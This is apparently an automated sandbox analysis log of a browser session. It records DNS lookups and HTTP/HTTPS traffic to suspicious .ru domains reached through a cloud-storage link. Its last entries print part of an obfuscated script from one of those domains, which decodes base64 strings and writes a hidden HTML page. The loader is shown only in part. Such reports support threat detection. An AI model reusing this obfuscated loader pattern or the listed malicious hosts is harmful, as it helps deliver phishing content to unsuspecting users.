Apr 15, 2025 18:49:55.659682035 CEST	53	51653	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:55.910321951 CEST	53	64238	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:59.042730093 CEST	53	62423	1.1.1.1	192.168.2.4
Apr 15, 2025 18:50:18.115200043 CEST	53	58273	1.1.1.1	192.168.2.4
Apr 15, 2025 18:50:40.303762913 CEST	53	59699	1.1.1.1	192.168.2.4
Apr 15, 2025 18:50:40.755945921 CEST	53	61003	1.1.1.1	192.168.2.4
Apr 15, 2025 18:50:43.035129070 CEST	53	53100	1.1.1.1	192.168.2.4
Apr 15, 2025 18:50:43.091332912 CEST	138	138	192.168.2.4	192.168.2.255
Apr 15, 2025 18:50:56.837852001 CEST	51361	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:50:56.838149071 CEST	49722	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:50:56.944649935 CEST	53	49722	1.1.1.1	192.168.2.4
Apr 15, 2025 18:50:56.944900036 CEST	53	51361	1.1.1.1	192.168.2.4
Apr 15, 2025 18:50:57.849239111 CEST	64803	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:50:57.849627972 CEST	64795	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:50:57.955971956 CEST	53	64795	1.1.1.1	192.168.2.4
Apr 15, 2025 18:50:57.956111908 CEST	53	64803	1.1.1.1	192.168.2.4
Apr 15, 2025 18:50:59.881035089 CEST	60096	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:50:59.988483906 CEST	53	60096	1.1.1.1	192.168.2.4
Apr 15, 2025 18:51:00.895899057 CEST	60096	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:51:01.002747059 CEST	53	60096	1.1.1.1	192.168.2.4
Apr 15, 2025 18:51:01.914280891 CEST	60096	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:51:02.020694017 CEST	53	60096	1.1.1.1	192.168.2.4
Apr 15, 2025 18:51:03.911375999 CEST	60096	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:51:04.018165112 CEST	53	60096	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 15, 2025 18:49:50.047645092 CEST	192.168.2.4	1.1.1.1	c24a	(Port unreachable)	Destination Unreachable
Apr 15, 2025 18:49:55.910412073 CEST	192.168.2.4	1.1.1.1	c27d	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 15, 2025 18:49:44.552330971 CEST	192.168.2.4	1.1.1.1	0xc61f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:44.552503109 CEST	192.168.2.4	1.1.1.1	0x7922	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 15, 2025 18:49:47.448373079 CEST	192.168.2.4	1.1.1.1	0xcee7	Standard query (0)	8rv.ngenerstr.ru	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:47.448373079 CEST	192.168.2.4	1.1.1.1	0xddb6	Standard query (0)	8rv.ngenerstr.ru	65	IN (0x0001)	false
Apr 15, 2025 18:49:49.009190083 CEST	192.168.2.4	1.1.1.1	0x8a69	Standard query (0)	d1c8jfpu8q0q2k.cloudfront.net	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:49.009449959 CEST	192.168.2.4	1.1.1.1	0x4dcf	Standard query (0)	d1c8jfpu8q0q2k.cloudfront.net	65	IN (0x0001)	false
Apr 15, 2025 18:49:49.874142885 CEST	192.168.2.4	1.1.1.1	0x6bf	Standard query (0)	d1c8jfpu8q0q2k.cloudfront.net	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:49.874494076 CEST	192.168.2.4	1.1.1.1	0x6f1d	Standard query (0)	d1c8jfpu8q0q2k.cloudfront.net	65	IN (0x0001)	false
Apr 15, 2025 18:49:50.039678097 CEST	192.168.2.4	1.1.1.1	0xaf66	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.039913893 CEST	192.168.2.4	1.1.1.1	0xd4e7	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 15, 2025 18:49:50.780497074 CEST	192.168.2.4	1.1.1.1	0xe32d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.780678034 CEST	192.168.2.4	1.1.1.1	0x848e	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 15, 2025 18:49:54.133766890 CEST	192.168.2.4	1.1.1.1	0xf1ad	Standard query (0)	iglq7.mlniojjrwm.ru	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:54.133996010 CEST	192.168.2.4	1.1.1.1	0xac80	Standard query (0)	iglq7.mlniojjrwm.ru	65	IN (0x0001)	false
Apr 15, 2025 18:49:55.509819031 CEST	192.168.2.4	1.1.1.1	0x1c83	Standard query (0)	iglq7.mlniojjrwm.ru	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:55.509963989 CEST	192.168.2.4	1.1.1.1	0x8d1b	Standard query (0)	iglq7.mlniojjrwm.ru	65	IN (0x0001)	false
Apr 15, 2025 18:50:56.837852001 CEST	192.168.2.4	1.1.1.1	0xdec5	Standard query (0)	beacons.gcp.gvt2.com	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:50:56.838149071 CEST	192.168.2.4	1.1.1.1	0xaf59	Standard query (0)	beacons.gcp.gvt2.com	65	IN (0x0001)	false
Apr 15, 2025 18:50:57.849239111 CEST	192.168.2.4	1.1.1.1	0xdc2d	Standard query (0)	beacons.gcp.gvt2.com	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:50:57.849627972 CEST	192.168.2.4	1.1.1.1	0x9172	Standard query (0)	beacons.gcp.gvt2.com	65	IN (0x0001)	false
Apr 15, 2025 18:50:59.881035089 CEST	192.168.2.4	1.1.1.1	0x408f	Standard query (0)	beacons.gcp.gvt2.com	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:51:00.895899057 CEST	192.168.2.4	1.1.1.1	0x408f	Standard query (0)	beacons.gcp.gvt2.com	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:51:01.914280891 CEST	192.168.2.4	1.1.1.1	0x408f	Standard query (0)	beacons.gcp.gvt2.com	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:51:03.911375999 CEST	192.168.2.4	1.1.1.1	0x408f	Standard query (0)	beacons.gcp.gvt2.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 15, 2025 18:49:44.659245968 CEST	1.1.1.1	192.168.2.4	0xc61f	No error (0)	www.google.com		173.194.219.105	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:44.659245968 CEST	1.1.1.1	192.168.2.4	0xc61f	No error (0)	www.google.com		173.194.219.103	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:44.659245968 CEST	1.1.1.1	192.168.2.4	0xc61f	No error (0)	www.google.com		173.194.219.106	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:44.659245968 CEST	1.1.1.1	192.168.2.4	0xc61f	No error (0)	www.google.com		173.194.219.147	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:44.659245968 CEST	1.1.1.1	192.168.2.4	0xc61f	No error (0)	www.google.com		173.194.219.99	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:44.659245968 CEST	1.1.1.1	192.168.2.4	0xc61f	No error (0)	www.google.com		173.194.219.104	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:44.659831047 CEST	1.1.1.1	192.168.2.4	0x7922	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 15, 2025 18:49:47.783731937 CEST	1.1.1.1	192.168.2.4	0xcee7	No error (0)	8rv.ngenerstr.ru		104.21.71.52	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:47.783731937 CEST	1.1.1.1	192.168.2.4	0xcee7	No error (0)	8rv.ngenerstr.ru		172.67.143.110	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:47.788379908 CEST	1.1.1.1	192.168.2.4	0xddb6	No error (0)	8rv.ngenerstr.ru			65	IN (0x0001)	false
Apr 15, 2025 18:49:49.143605947 CEST	1.1.1.1	192.168.2.4	0x8a69	No error (0)	d1c8jfpu8q0q2k.cloudfront.net		3.165.184.23	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:49.143605947 CEST	1.1.1.1	192.168.2.4	0x8a69	No error (0)	d1c8jfpu8q0q2k.cloudfront.net		3.165.184.221	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:49.143605947 CEST	1.1.1.1	192.168.2.4	0x8a69	No error (0)	d1c8jfpu8q0q2k.cloudfront.net		3.165.184.110	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:49.143605947 CEST	1.1.1.1	192.168.2.4	0x8a69	No error (0)	d1c8jfpu8q0q2k.cloudfront.net		3.165.184.56	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.007838964 CEST	1.1.1.1	192.168.2.4	0x6bf	No error (0)	d1c8jfpu8q0q2k.cloudfront.net		3.165.184.23	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.007838964 CEST	1.1.1.1	192.168.2.4	0x6bf	No error (0)	d1c8jfpu8q0q2k.cloudfront.net		3.165.184.221	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.007838964 CEST	1.1.1.1	192.168.2.4	0x6bf	No error (0)	d1c8jfpu8q0q2k.cloudfront.net		3.165.184.56	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.007838964 CEST	1.1.1.1	192.168.2.4	0x6bf	No error (0)	d1c8jfpu8q0q2k.cloudfront.net		3.165.184.110	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.145992994 CEST	1.1.1.1	192.168.2.4	0xaf66	No error (0)	www.google.com		108.177.122.105	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.145992994 CEST	1.1.1.1	192.168.2.4	0xaf66	No error (0)	www.google.com		108.177.122.147	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.145992994 CEST	1.1.1.1	192.168.2.4	0xaf66	No error (0)	www.google.com		108.177.122.99	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.145992994 CEST	1.1.1.1	192.168.2.4	0xaf66	No error (0)	www.google.com		108.177.122.103	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.145992994 CEST	1.1.1.1	192.168.2.4	0xaf66	No error (0)	www.google.com		108.177.122.106	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.145992994 CEST	1.1.1.1	192.168.2.4	0xaf66	No error (0)	www.google.com		108.177.122.104	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.146796942 CEST	1.1.1.1	192.168.2.4	0xd4e7	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 15, 2025 18:49:50.887049913 CEST	1.1.1.1	192.168.2.4	0xe32d	No error (0)	www.google.com		108.177.122.103	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.887049913 CEST	1.1.1.1	192.168.2.4	0xe32d	No error (0)	www.google.com		108.177.122.147	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.887049913 CEST	1.1.1.1	192.168.2.4	0xe32d	No error (0)	www.google.com		108.177.122.99	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.887049913 CEST	1.1.1.1	192.168.2.4	0xe32d	No error (0)	www.google.com		108.177.122.104	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.887049913 CEST	1.1.1.1	192.168.2.4	0xe32d	No error (0)	www.google.com		108.177.122.105	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.887049913 CEST	1.1.1.1	192.168.2.4	0xe32d	No error (0)	www.google.com		108.177.122.106	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:50.887132883 CEST	1.1.1.1	192.168.2.4	0x848e	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 15, 2025 18:49:54.470405102 CEST	1.1.1.1	192.168.2.4	0xac80	No error (0)	iglq7.mlniojjrwm.ru			65	IN (0x0001)	false
Apr 15, 2025 18:49:54.514976025 CEST	1.1.1.1	192.168.2.4	0xf1ad	No error (0)	iglq7.mlniojjrwm.ru		104.21.25.37	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:54.514976025 CEST	1.1.1.1	192.168.2.4	0xf1ad	No error (0)	iglq7.mlniojjrwm.ru		172.67.222.152	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:55.659682035 CEST	1.1.1.1	192.168.2.4	0x1c83	No error (0)	iglq7.mlniojjrwm.ru		104.21.25.37	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:55.659682035 CEST	1.1.1.1	192.168.2.4	0x1c83	No error (0)	iglq7.mlniojjrwm.ru		172.67.222.152	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:49:55.910321951 CEST	1.1.1.1	192.168.2.4	0x8d1b	No error (0)	iglq7.mlniojjrwm.ru			65	IN (0x0001)	false
Apr 15, 2025 18:50:56.944649935 CEST	1.1.1.1	192.168.2.4	0xaf59	No error (0)	beacons.gcp.gvt2.com	beacons-handoff.gcp.gvt2.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 15, 2025 18:50:56.944900036 CEST	1.1.1.1	192.168.2.4	0xdec5	No error (0)	beacons.gcp.gvt2.com	beacons-handoff.gcp.gvt2.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 15, 2025 18:50:56.944900036 CEST	1.1.1.1	192.168.2.4	0xdec5	No error (0)	beacons-handoff.gcp.gvt2.com		142.251.116.94	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:50:57.955971956 CEST	1.1.1.1	192.168.2.4	0x9172	No error (0)	beacons.gcp.gvt2.com	beacons-handoff.gcp.gvt2.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 15, 2025 18:50:57.956111908 CEST	1.1.1.1	192.168.2.4	0xdc2d	No error (0)	beacons.gcp.gvt2.com	beacons-handoff.gcp.gvt2.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 15, 2025 18:50:57.956111908 CEST	1.1.1.1	192.168.2.4	0xdc2d	No error (0)	beacons-handoff.gcp.gvt2.com		74.125.136.94	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:50:59.988483906 CEST	1.1.1.1	192.168.2.4	0x408f	No error (0)	beacons.gcp.gvt2.com	beacons-handoff.gcp.gvt2.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 15, 2025 18:50:59.988483906 CEST	1.1.1.1	192.168.2.4	0x408f	No error (0)	beacons-handoff.gcp.gvt2.com	gce-beacons.gcp.gvt2.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 15, 2025 18:50:59.988483906 CEST	1.1.1.1	192.168.2.4	0x408f	No error (0)	gce-beacons.gcp.gvt2.com		35.241.39.74	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:51:01.002747059 CEST	1.1.1.1	192.168.2.4	0x408f	No error (0)	beacons.gcp.gvt2.com	beacons-handoff.gcp.gvt2.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 15, 2025 18:51:01.002747059 CEST	1.1.1.1	192.168.2.4	0x408f	No error (0)	beacons-handoff.gcp.gvt2.com	gce-beacons.gcp.gvt2.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 15, 2025 18:51:01.002747059 CEST	1.1.1.1	192.168.2.4	0x408f	No error (0)	gce-beacons.gcp.gvt2.com		35.241.39.74	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:51:02.020694017 CEST	1.1.1.1	192.168.2.4	0x408f	No error (0)	beacons.gcp.gvt2.com	beacons-handoff.gcp.gvt2.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 15, 2025 18:51:02.020694017 CEST	1.1.1.1	192.168.2.4	0x408f	No error (0)	beacons-handoff.gcp.gvt2.com	gce-beacons.gcp.gvt2.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 15, 2025 18:51:02.020694017 CEST	1.1.1.1	192.168.2.4	0x408f	No error (0)	gce-beacons.gcp.gvt2.com		35.241.39.74	A (IP address)	IN (0x0001)	false
Apr 15, 2025 18:51:04.018165112 CEST	1.1.1.1	192.168.2.4	0x408f	No error (0)	beacons.gcp.gvt2.com	beacons-handoff.gcp.gvt2.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 15, 2025 18:51:04.018165112 CEST	1.1.1.1	192.168.2.4	0x408f	No error (0)	beacons-handoff.gcp.gvt2.com	gce-beacons.gcp.gvt2.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 15, 2025 18:51:04.018165112 CEST	1.1.1.1	192.168.2.4	0x408f	No error (0)	gce-beacons.gcp.gvt2.com		35.241.39.74	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

storage.googleapis.com

8rv.ngenerstr.ru

d1c8jfpu8q0q2k.cloudfront.net

www.google.com

iglq7.mlniojjrwm.ru

c.pki.goog

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.4	49742	74.125.136.94	80

Timestamp	Bytes transferred	Direction	Data
Apr 15, 2025 18:49:51.863655090 CEST	200	OUT	GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Apr 15, 2025 18:49:51.971504927 CEST	1243	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="cacerts" Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]} Content-Length: 530 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Tue, 15 Apr 2025 16:10:44 GMT Expires: Tue, 15 Apr 2025 17:00:44 GMT Cache-Control: public, max-age=3000 Age: 2347 Last-Modified: Thu, 03 Apr 2025 14:18:00 GMT Content-Type: application/pkix-crl Vary: Accept-Encoding Data Raw: 30 82 02 0e 30 82 01 93 02 01 01 30 0a 06 08 2a 86 48 ce 3d 04 03 03 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 34 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 17 0d 32 36 30 32 32 38 30 37 35 39 35 39 5a 30 81 e9 30 2f 02 10 6e 47 a9 ce 4f 46 c2 3d e2 49 ea cc 38 94 53 73 17 0d 31 39 30 39 33 30 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 f0 9c 5b 70 05 a6 dc 86 e2 f9 9e f3 17 0d 32 30 30 31 33 31 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 fe a5 81 44 7e 3b fd 3b b8 1c 24 98 17 0d 32 33 30 36 31 33 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 16 68 25 e1 70 04 40 61 24 91 f5 40 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 00 8e b2 58 e7 b5 94 0c 1f f9 00 44 17 0d 32 35 30 [TRUNCATED] Data Ascii: 000H=0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R4250403080000Z260228075959Z00/nGOF=I8Ss190930000000Z00U0,[p200131000000Z00U0,D~;;$230613000000Z00U0,h%p@a$@250403080000Z00U0,XD250403080000Z00U/0-0U0U#0LtI6>j0H=i0f1>2en:IN@g=;bQZ~`NX1?^4y[$\4{;$zDeU6O

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	104.21.71.52	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-15 16:49:48 UTC	734	OUT	GET /qJM63Jo/ HTTP/1.1 Host: 8rv.ngenerstr.ru Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Sec-Fetch-Storage-Access: active Referer: https://storage.googleapis.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-15 16:49:48 UTC	1223	IN	HTTP/1.1 200 OK Date: Tue, 15 Apr 2025 16:49:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Server: cloudflare Cache-Control: no-cache, private Vary: accept-encoding Cf-Cache-Status: DYNAMIC Alt-Svc: h3=":443"; ma=86400 Set-Cookie: XSRF-TOKEN=eyJpdiI6IlBQMkdsOTZGQVJyMS9vR0YwOW1NUnc9PSIsInZhbHVlIjoiVlkxSlpLMHpFYkdxRXN5dnhMaHNTdFp4Q1VCa1VGOUJWNzQ5NGVBa25GaFVMWDF4Ym5QUDl5SGN4WnpoVUtEUCtIdVdzWXp2ZGdEWmtrRkhSUkQvM29aQWZidnNpZ3UxUDRXTjA3M1NWV05hVW5YWDZGNlo5MjZsRzB3UnVxNisiLCJtYWMiOiIxZmYyMTczNzVjNGNkNDRiMTYzMThmZDBjZDI2ZWIwZTdlNmE2YzFkNmNiZjhiODM4OTQwNGI1ZmY3YjRjNTUzIiwidGFnIjoiIn0%3D; SameSite=None; Secure; Path=/; Max-Age=7200; Expires=Tue, 15 Apr 2025 18:49:48 GMT Set-Cookie: laravel_session=eyJpdiI6Im8xRUNDbjY4blloUDljakZ5UlJtWWc9PSIsInZhbHVlIjoiR0xWSG4xRTBPa3B2U2xGT1NWekNEOE0vQkVPcHNYMURmTk9DNHRWejZqZjdYcjNUYmhEY3VUOHIvVFVnVVNvNXdVdTdKeHozMkFZeDdMOEpXcjNGaG8zZW9oQnU5SmdkS2dtTW96clpreE42YVovS3F5VEpuQWJ1TFZIMW5GeVQiLCJtYWMiOiJhZTJmNzlmMDhhZTI5MWI3MTU0ZjVkYmQzYTczZTYwMDg5ODQ0YmNiNGY2ZTg3OTljMWRlMzA2NTY3OGJmN2VkIiwidGFnIjoiIn0%3D; HttpOnly; SameSite=None; Secure; Path=/; Max-Age=7200; Expires=Tue, 15 Apr 2025 18:49:48 GMT CF-RAY: 930cf0349bb90861-MIA
2025-04-15 16:49:48 UTC	1369	IN	Data Raw: 35 30 30 30 0d 0a 3c 73 63 72 69 70 74 3e 0a 73 50 6c 76 77 69 4c 59 54 79 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 50 52 43 35 75 5a 32 56 75 5a 58 4a 7a 64 48 49 75 63 6e 55 76 63 55 70 4e 4e 6a 4e 4b 62 79 38 3d 22 29 3b 0a 73 52 68 73 6f 4e 52 70 73 7a 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 6a 59 45 52 71 79 64 49 4c 6f 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 73 50 6c 76 77 69 4c 59 54 79 20 3d 3d 20 73 52 68 73 6f 4e 52 70 73 7a 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 6a 59 45 52 71 79 64 49 4c 6f 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f Data Ascii: 5000<script>sPlvwiLYTy = atob("aHR0cHM6Ly9PRC5uZ2VuZXJzdHIucnUvcUpNNjNKby8=");sRhsoNRpsz = atob("bm9tYXRjaA==");jYERqydILo = atob("d3JpdGU=");if(sPlvwiLYTy == sRhsoNRpsz){document[jYERqydILo](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+Cjxo
2025-04-15 16:49:48 UTC	1369	IN	Data Raw: 49 74 59 6d 39 34 4f 33 30 4b 4f 6d 46 6d 64 47 56 79 4c 44 70 69 5a 57 5a 76 63 6d 56 37 4c 53 31 30 64 79 31 6a 62 32 35 30 5a 57 35 30 4f 69 49 69 4f 33 30 4b 59 58 74 6a 62 32 78 76 63 6a 70 70 62 6d 68 6c 63 6d 6c 30 4f 33 52 6c 65 48 51 74 5a 47 56 6a 62 33 4a 68 64 47 6c 76 62 6a 70 70 62 6d 68 6c 63 6d 6c 30 4f 33 30 4b 61 57 35 77 64 58 52 37 5a 6d 39 75 64 43 31 6d 5a 57 46 30 64 58 4a 6c 4c 58 4e 6c 64 48 52 70 62 6d 64 7a 4f 6d 6c 75 61 47 56 79 61 58 51 37 59 32 39 73 62 33 49 36 61 57 35 6f 5a 58 4a 70 64 44 74 6d 62 32 35 30 4c 57 5a 68 62 57 6c 73 65 54 70 70 62 6d 68 6c 63 6d 6c 30 4f 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 78 4d 44 41 6c 4f 32 5a 76 62 6e 51 74 64 6d 46 79 61 57 46 30 61 57 39 75 4c 58 4e 6c 64 48 52 70 62 6d 64 7a 4f Data Ascii: ItYm94O30KOmFmdGVyLDpiZWZvcmV7LS10dy1jb250ZW50OiIiO30KYXtjb2xvcjppbmhlcml0O3RleHQtZGVjb3JhdGlvbjppbmhlcml0O30KaW5wdXR7Zm9udC1mZWF0dXJlLXNldHRpbmdzOmluaGVyaXQ7Y29sb3I6aW5oZXJpdDtmb250LWZhbWlseTppbmhlcml0O2ZvbnQtc2l6ZToxMDAlO2ZvbnQtdmFyaWF0aW9uLXNldHRpbmdzO
2025-04-15 16:49:48 UTC	1369	IN	Data Raw: 75 64 43 35 6c 62 33 51 2f 49 32 6c 6c 5a 6d 6c 34 4a 79 6b 67 5a 6d 39 79 62 57 46 30 4b 43 64 6c 62 57 4a 6c 5a 47 52 6c 5a 43 31 76 63 47 56 75 64 48 6c 77 5a 53 63 70 4c 48 56 79 62 43 67 6e 61 48 52 30 63 48 4d 36 4c 79 39 6b 4d 57 4d 34 61 6d 5a 77 64 54 68 78 4d 48 45 79 61 79 35 6a 62 47 39 31 5a 47 5a 79 62 32 35 30 4c 6d 35 6c 64 43 39 7a 64 47 46 30 61 57 4e 7a 4c 32 4e 79 62 33 42 77 5a 57 51 76 61 6e 4d 76 5a 6d 39 75 64 48 4d 76 55 32 6c 73 61 32 45 74 55 6d 39 74 59 57 34 74 56 32 56 69 5a 6d 39 75 64 43 39 7a 61 57 78 72 59 53 31 69 62 32 78 6b 4c 58 64 6c 59 6d 5a 76 62 6e 51 75 64 32 39 6d 5a 6a 49 6e 4b 53 42 6d 62 33 4a 74 59 58 51 6f 4a 33 64 76 5a 6d 59 79 4a 79 6b 73 64 58 4a 73 4b 43 64 6f 64 48 52 77 63 7a 6f 76 4c 32 51 78 59 7a Data Ascii: udC5lb3Q/I2llZml4JykgZm9ybWF0KCdlbWJlZGRlZC1vcGVudHlwZScpLHVybCgnaHR0cHM6Ly9kMWM4amZwdThxMHEyay5jbG91ZGZyb250Lm5ldC9zdGF0aWNzL2Nyb3BwZWQvanMvZm9udHMvU2lsa2EtUm9tYW4tV2ViZm9udC9zaWxrYS1ib2xkLXdlYmZvbnQud29mZjInKSBmb3JtYXQoJ3dvZmYyJyksdXJsKCdodHRwczovL2QxYz
2025-04-15 16:49:48 UTC	1369	IN	Data Raw: 5a 69 63 70 49 47 5a 76 63 6d 31 68 64 43 67 6e 64 32 39 6d 5a 69 63 70 4c 48 56 79 62 43 67 6e 61 48 52 30 63 48 4d 36 4c 79 39 6b 4d 57 4d 34 61 6d 5a 77 64 54 68 78 4d 48 45 79 61 79 35 6a 62 47 39 31 5a 47 5a 79 62 32 35 30 4c 6d 35 6c 64 43 39 7a 64 47 46 30 61 57 4e 7a 4c 32 4e 79 62 33 42 77 5a 57 51 76 61 6e 4d 76 5a 6d 39 75 64 48 4d 76 55 32 6c 73 61 32 45 74 55 6d 39 74 59 57 34 74 56 32 56 69 5a 6d 39 75 64 43 39 7a 61 57 78 72 59 53 31 7a 5a 57 31 70 59 6d 39 73 5a 43 31 33 5a 57 4a 6d 62 32 35 30 4c 6e 52 30 5a 69 63 70 49 47 5a 76 63 6d 31 68 64 43 67 6e 64 48 4a 31 5a 58 52 35 63 47 55 6e 4b 54 74 6d 62 32 35 30 4c 58 64 6c 61 57 64 6f 64 44 6f 32 4d 44 41 37 5a 6d 39 75 64 43 31 7a 64 48 6c 73 5a 54 70 75 62 33 4a 74 59 57 77 37 66 51 70 Data Ascii: 